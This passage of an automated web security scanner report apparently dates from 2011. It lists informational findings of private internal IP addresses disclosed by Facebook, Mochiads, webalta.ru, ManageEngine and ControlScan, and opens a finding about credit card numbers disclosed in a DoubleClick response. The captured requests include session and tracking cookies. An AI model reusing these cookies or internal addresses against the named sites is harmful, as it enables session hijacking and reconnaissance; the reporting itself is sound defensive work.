X-Mochi-Source: 10.0.0.239:3832
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:45:26 GMT
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

CWS
.b..x..}.|TU..9...I.IBo..-^ .T[BHB00.    e..;....d3...........Q.&..DE..." .uu......;..d.........!........3#...MH.c....x.B..o.....r..m;m.....w...h..jo0.y..d.....O[?..N..{r.....+.X.o..7....}v.7..;.~..
...[SNIP]...

26.3. http://games.mochiads.com/c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/public/flash/r4/ef_the_game.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 62901
Last-Modified: Tue, 20 Jul 2010 15:00:02 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.238:2874
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:47:29 GMT
Date: Mon, 25 Apr 2011 14:47:29 GMT
Connection: close

CWS    .|..x....\T....v.$j...MP..I..i.....$ *."*"2.tZ.3"H.....&.(.@m......Q.3*&.c._....s..w.y......w>.X.v.U.j....."`...Z..F......q.....X]....9....5=iqb......g.&....d.P@..`..;....-....(....i......@ .....@
...[SNIP]...

26.4. http://games.mochiads.com/c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 1428
Last-Modified: Sun, 28 Dec 2008 12:34:04 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.21:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.236:53219
Cache-Control: max-age=43200
Expires: Tue, 26 Apr 2011 02:46:57 GMT
Date: Mon, 25 Apr 2011 14:46:57 GMT
Connection: close

CWS    d...x...Mo.I.........c{.6....'q....$...........HY.
..;..<.3cu..|.@.......>..8,..,.\.....q........8s..4.].T.SU.2.c    >.........HD6....w.......F..~7;.+>.....$.....J.8w..'....\...c..................
...[SNIP]...

26.5. http://my.webalta.ru/public/engine/settings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/settings.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /public/engine/settings.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:12 GMT
Content-Type: application/x-javascript
Content-Length: 3396
Last-Modified: Tue, 23 Dec 2008 15:27:11 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:12 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...
var fw={};var block={};var page={}; var page_load={}; var block_prop={};var g_st={};
var save_key = false;
function f_new(name)
{
       this.Modules={};
   
}
var Catalog = {};
var Catalog_ =
...[SNIP]...
_block = false;//* ............ .......... ...... .............. .......................... ........................
var Move_html="";

var mode;
var g_url_pr = 'my.webalta.ru';
//var g_url_pr = '192.168.140.29';
var g_url_ = 'http://'+g_url_pr+'/public/engine/widget/';
var g_url_cat = 'http://'+g_url_pr+'/public/engine/catalog/';
var g_url_proxy = 'http://'+g_url_pr+'/feed/l.php?url=';
var g_url_xslt =
...[SNIP]...

26.6. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3011c9318%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff27180d43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=270
Expires: Mon, 25 Apr 2011 14:57:09 GMT
Date: Mon, 25 Apr 2011 14:52:39 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.7. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.184
Vary: Accept-Encoding
Cache-Control: public, max-age=911
Expires: Mon, 25 Apr 2011 13:07:59 GMT
Date: Mon, 25 Apr 2011 12:52:48 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.8. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zX/r/i_oIVTKMYsL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zX/r/i_oIVTKMYsL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:57:45 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.16.185
Cache-Control: public, max-age=27993760
Expires: Wed, 14 Mar 2012 14:56:08 GMT
Date: Mon, 25 Apr 2011 14:53:28 GMT
Connection: close

.PNG
.
...IHDR..............o&....#IDAT.[c...v.....].....A..\.Y.,..@....\.-.    .....IEND.B`.

26.9. http://tools.manageengine.com/forums/me/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/me/forum.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /forums/me/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/meforum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51202

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>body{}
.forumTitle{float:left;margin-top:-12px;padding-left:10px;font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:22px;t
...[SNIP]...
<a href='http://10.0.0.90:8080/WorkOrder.do?woMode=viewWO&amp;woID=1951' target='_blank'>http://10.0.0.90:8080/WorkOrder.do?woMode=viewWO&amp;woID=1951<\/a>
...[SNIP]...

26.10. http://tools.manageengine.com/forums/security-manager/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/security-manager/forum.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /forums/security-manager/forum.php?limit=5&char=25 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64425

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a style=\"font-style: italic;\" href=\"http://192.168.118.128:6262//store?f=300132-jre-6u23-windows-i586-s.exe$1,\" target=\"_blank\">http://192.168.118.128:6262//store?f=300132-jre-6u23-windows-i586-s.exe$1<\/a>
...[SNIP]...

26.11. https://www.controlscan.com/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /checkout.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /checkout.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/shoppingcart.php?itemsadded=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</textarea> (Ex: www.yoursite.com or 192.168.0.15)

<hr />
...[SNIP]...

26.12. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df390c5570%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff6001b114%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.52.27
X-Cnection: close
Date: Mon, 25 Apr 2011 14:52:31 GMT
Content-Length: 8107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.13. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3011c9318%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff27180d43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.103.81
X-Cnection: close
Date: Mon, 25 Apr 2011 14:52:39 GMT
Content-Length: 8110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.14. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31664749%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff722d66cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.215.116
X-Cnection: close
Date: Mon, 25 Apr 2011 12:59:01 GMT
Content-Length: 8112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.15. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.16. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3cde351e4%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff28ffd8ef%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/server-security/linux-file
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.198.128
X-Cnection: close
Date: Mon, 25 Apr 2011 12:58:51 GMT
Content-Length: 8147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

27. Credit card numbers disclosed  previous  next
There are 3 instances of this issue:


27.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lj.homepage/loggedout

Issue detail

The following credit card number was disclosed in the response:

Request

GET /adj/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=300x250;pos=r;tile=3;ord=2623414837? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:46 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 5082

function googleAdSlot(id, contents) {this.id_ = id;this.contents_ = contents;this.loaded_ = false;}function addAdSenseContent(w, slot_id, content) {var params_map = w['google_slot_contents'] ||(w['goo
...[SNIP]...
